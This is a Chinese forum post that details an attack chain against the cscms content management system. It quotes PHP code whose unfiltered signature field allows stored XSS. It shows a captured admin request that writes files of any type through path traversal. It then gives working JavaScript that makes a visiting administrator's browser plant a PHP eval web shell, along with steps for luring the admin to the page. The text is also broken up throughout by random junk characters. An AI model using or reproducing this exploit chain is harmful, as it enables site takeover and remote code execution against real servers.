|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题7 H7 X7 B2 x# `
官网已经修补了,所以重新下了源码
/ h( ^' J9 |: r8 S+ e因为 后台登入 还需要认证码 所以 注入就没看了。
9 k4 M( W2 Z$ m j9 w; w% Y9 N% y存在 xss# i' d/ u9 P+ D6 [
漏洞文件 user/member/skin_edit.php
1 t0 C6 l8 _4 s. ^8 w" {% f: h本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:$ a7 K9 S' X5 f" Y
+ B0 _4 R2 S3 \6 L! _- j
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
, [" u& ~" F+ G( C0 a ) r, g. r* I2 ~* l4 p4 N
</textarea></td></tr>
" S+ U7 R! a( k" P/ Y, r' J % m" q" w J8 O$ a
user/do.php 1 H; E* E& ^( q t
3 y3 _8 e9 j' P" E9 O4 Q \8 _& ^
/ s5 s5 b/ l# N" `% gif($op=='zl'){ //资料
1 n3 B& v- {/ \ . p8 S) N5 a I; k, k0 z
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 1 p# v3 q( ]- p
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));2 w; d# d/ o' Z
* W. b& `4 h& c6 L4 K
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
% o! [8 P' L: j7 _
% N5 ~* i9 m: A5 \; s CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'. a7 [5 H( F8 D9 P* ]2 o8 n
where CS_Name='".$cscms_name."'";7 m( c7 @8 s/ _1 t2 O3 c
& Y1 `( t/ |- W
if($db->query($sql)){& _8 c, S$ U9 s5 M
0 Q; R( q: F* s8 B exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
' I' A4 j. r1 e & N+ g" n* C* S6 `. e
}else{3 d! e& e, f" z; Q' F$ u; k
3 Q& D8 F4 Z$ J* f# j) T9 T8 C
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));# n* L4 z9 e) g" w! h1 e7 r
& I5 }9 |/ f! [- A3 {
} G: P7 }1 x( a' `5 |
. ?4 W4 [, w8 L
, O" v- w+ K( I; ?: n没有 过滤导致xss产生。0 }( S7 r+ D( B9 e* F
后台 看了下 很奇葩的是可以写任意格式文件。。8 T2 t( {; A+ [4 Y1 }7 {( e: K2 w6 n8 I
抓包。。4 l* A# ~( B6 U# f4 k& l, X4 R
+ {. G0 O' u0 g) S' n3 M
! ^; h2 W3 F7 p# p: z
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
; s* e( o# N& N+ y" Y8 C3 R
6 O5 T8 q; i, P' bAccept: text/html, application/xhtml+xml, */*8 @9 S! \6 s9 n% }. _
- s; ]4 W; {: J- O6 hReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php) O' `- S: E, C6 }+ @4 E5 u
# o$ S% e% {0 I" {0 B$ ~
Accept-Language: zh-CN, i0 G j$ b+ W! u
" d' t, I' E" N% X# R, y1 i v4 W: FUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)) Y# K( d: p% D9 ^9 u( g3 f
+ i$ k% M; ~/ |, E: F5 m, N
Content-Type: application/x-www-form-urlencoded$ |5 z; V$ t4 @ D
8 g+ U' A5 B* E- x7 t0 x8 Z! \! eAccept-Encoding: gzip, deflate
. E' L- g, B' l: c3 I- a+ o3 Q5 ^ & j: t1 v' Y: b! N& o7 M
Host: 127.0.0.1+ i$ d& J! e2 J( o2 y, ^# {
: f1 x! ~$ q! l Q9 _5 c+ |Content-Length: 38
( S) D3 s% }6 ?; ~" r) n
" m. Q4 {3 Q- b9 o7 _DNT: 1) m1 r7 t& }4 E( a% w1 Q* m
( P& ?* B. j3 p. K) k" OConnection: Keep-Alive
# u* `5 \" l- z9 Q
- P3 ~9 C2 H3 g( w+ M4 r' pCache-Control: no-cache
) [1 u/ I+ d/ E& c2 H
$ A1 [2 p3 d* R' G JCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
) U* d1 j' i/ c, J; Q - {) I4 ] Y5 d
( Y. S& T* N" a u9 cname=aaa.php&content=%3Cs%3E%3Ca%25%3E d; B# L8 v! f+ ^
9 ~5 c! M3 H! F8 c4 d. K& H9 b" B
3 ^1 o3 H& @& J. E8 R
" e M5 Z" g2 W4 r# [于是 构造js如下。& i7 J, K5 u( k4 z' T- z7 l) h
7 b' L$ X* H4 X$ b4 N: g
本帖隐藏的内容<script> . S4 @; Y$ l* z5 I) c. [+ n
thisTHost = top.location.hostname;9 w. {( {1 ]# M1 r8 b9 o/ P* V
+ w5 \ ?2 W5 f7 t9 ~2 @9 othisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
0 h1 p, k I( X P9 ?/ p ; Q/ Y+ D! F' }$ G4 j3 q5 n5 R" w; s
function PostSubmit(url, data, msg) { k- l! q" T4 u
var postUrl = url;
; `/ f9 l0 @2 N5 @# _
6 ?3 }! s: N0 u; `3 h var postData = data;
0 ^$ `7 W3 w- N4 e" F3 r var msgData = msg; j' N; b$ k! r1 Y+ |% m
var ExportForm = document.createElement("FORM"); / m) j+ E$ {6 Y. @, T
document.body.appendChild(ExportForm);
5 I! d+ s7 E2 C. l' S ExportForm.method = "POST";
# f/ K$ a! {: H& ^* C/ M7 J- |" s: D var newElement = document.createElement("input"); + a" s1 a: y6 }6 r( U5 S
newElement.setAttribute("name", "name");
4 L. P2 }7 B7 g2 W# Q0 o7 R" e newElement.setAttribute("type", "hidden");
2 W4 {+ @. }) t+ D/ G% O/ q/ ^ var newElement2 = document.createElement("input"); " P+ Q( z+ t6 ~3 h3 A; j
newElement2.setAttribute("name", "content");
4 Z) n. J" H Z, p2 v. o. c newElement2.setAttribute("type", "hidden"); 7 ^+ H. d* ^8 N& r! X
ExportForm.appendChild(newElement); * _8 [7 g* B% f, b5 J2 a' v
ExportForm.appendChild(newElement2);
4 a X% ^% E+ L newElement.value = postData;
; t2 X$ l" v3 _2 {8 L) B newElement2.value = msgData;
/ d1 ~( c+ G! {$ t7 y" [ q ExportForm.action = postUrl;
! ?. ?) `; z; d/ a8 ~' k0 ^ ExportForm.submit();
, w. H1 v% Q( }9 @2 _& b};
' v7 I* \- {2 Z* l
) } u. L, [ i5 A# y, ~PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");! }& H7 D2 b/ b( |$ q8 k1 |
, o6 [3 P+ P; Z</script>( k/ t: C- o3 _: F) n3 a/ L
) w# @- `; R2 [6 t9 Q5 @! v
! [0 p6 e# r- L+ ~+ y1 z
) E& O" I7 H3 Chttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入; w/ E$ T+ Q: Q' F6 r5 F
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
! l8 j1 C$ S ?. Z& M% B就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
* `: ~ a) f' R$ n1 L' y
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对